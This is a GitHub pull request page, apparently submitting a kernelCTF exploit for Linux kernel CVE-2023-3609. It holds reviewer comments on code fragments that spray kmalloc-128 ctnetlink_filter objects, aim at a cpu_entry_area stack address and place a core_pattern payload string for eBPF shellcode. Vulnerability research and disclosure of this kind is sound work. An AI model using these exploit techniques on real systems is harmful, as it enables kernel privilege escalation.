Add kernelCTF CVE-2023-3609 #48
Conversation
|
Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA). View this failed invocation of the CLA check for more information. For the most up to date status, view the checks section at the bottom of the pull request. |
koczkatamas
force-pushed
the
master
branch
2 times, most recently
from
d8211d8 to
22b1cba
Compare
|
@koczkatamas we fix the comments already |
| 0x0000000100000000, 0x0001000000010010, | ||
| 0x0000000000000000}; | ||
|
|
||
| size_t payment[] = { |
There was a problem hiding this comment.
Please add a comment on how did you get these values.
There was a problem hiding this comment.
Also using a variable name like ctnetlink_filter_payload would increase readability.
There was a problem hiding this comment.
And mentioned that the purpose of this is to spray a kmalloc-128 structure ctnetlink_filter while setting 0x60 offset via CTA_MARK and CTA_MARK_MASK to 0xfffffe000003df58 which the address of CPU#1 cpu_entry_area's entry_stack_page (stack address).
| char *core = (void *)mmap((void *)0xa00000, 0x2000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0); | ||
| strcpy(core, "|/proc/%P/fd/666"); // put payload string into known address which will used by ebpf shellcode | ||
|
|
||
| int sp = socket(0x10ul, 3ul, 0xc); // later use this socket to spray struct ctnetlink_filter |
There was a problem hiding this comment.
Please use known constant values instead of 0x10, 3, 0xc or comment the meaning of these values.
No description provided.